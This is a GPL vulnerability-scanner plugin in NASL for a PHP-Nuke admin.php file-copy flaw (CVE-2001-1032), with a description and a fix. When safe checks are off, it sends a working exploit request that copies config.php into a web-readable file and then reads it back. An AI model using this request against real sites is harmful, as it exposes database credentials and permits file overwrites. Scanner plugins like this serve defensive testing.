#####################################################################
# Released under GPL - from the initial feed
#
#
#
#
#
#PHP-Nuke
#
# Updated: 2009/04/24
# Chandan S <schandan@secpod.com>
#
#
#
######################################################################
if (description)
{
  script_id(10772);
  script_bugtraq_id(3361);
  script_cve_id("CVE-2001-1032");
  script_version ("$Revision: 3193 $");
  script_name(english:"PHP-Nuke copying files security vulnerability (admin.php)");
  desc["english"] = "
  The remote host seems to be vulnerable to a security problem in
  PHP-Nuke (admin.php).
  The vulnerability is caused by inadequate processing of queries
  by PHP-Nuke's admin.php which enables attackers to copy any file
  from the operating system to anywhere else on the operating system.

  Impact:
  Every file that the webserver has access to can be read by anyone.
  Furthermore, any file can be overwritten.
  Usernames (used for database access) can be compromised.
  Administrative privileges can be gained by copying sensitive files.

  Solution:
  Change the following lines in admin.php:
  if($upload)
  To:
  if(($upload) && ($admintest))
  Or upgrade to the latest version (Version 5.3 and above).

  Risk factor:High

  Additional information:
  http://www.securiteam.com/unixfocus/TOBA";
  script_description(english:desc["english"]);
  script_summary(english:"Determine if a remote host is vulnerable to the admin.php vulnerability");
  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2001 SecurITeam");
  script_dependencie("secpod_php_nuke_detect.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");

port = get_http_port(default:80);

if(!get_port_state(port)){
  exit(0);
}

phpVer =get_kb_item("www/" + port + "/php-nuke");
phpVer = eregmatch(pattern:"(.*) under (.*)", string:phpVer);

if(phpVer[1] == NULL && phpVer[2] == NULL){
   exit(0);
}

version=phpVer[1];
dir = phpVer[2];

if(!safe_checks())
{
  data = string(dir, "admin.php?upload=1&file=config.php&file_name=openvas.txt&wdir=/images/&userfile=config.php&userfile_name=openvas.txt");
  req = http_get(item:data, port:port);
  buf = http_keepalive_send_recv(port:port, data:req);
  if(buf == NULL){
    exit(0);
  }
  if("SAFE MODE " >< buf)
  {
    security_note(port);
    exit(0);
   }
   if("Unable to create " >< buf)
   {
     security_hole(port);
     exit(0);
   }
   req = http_get(item:"/images/openvas.txt", port:port);
   buf = http_keepalive_send_recv(port:port, data:req);
   if(("PHP-NUKE: Web Portal System" >< buf) && (("?php" >< buf) || ("?PHP" >< buf)))
   {
     security_hole(port);
     exit(0);
   }
}

if(version_is_less_equal(version:version,test_version:"5.4")){
   security_warning(port);
}
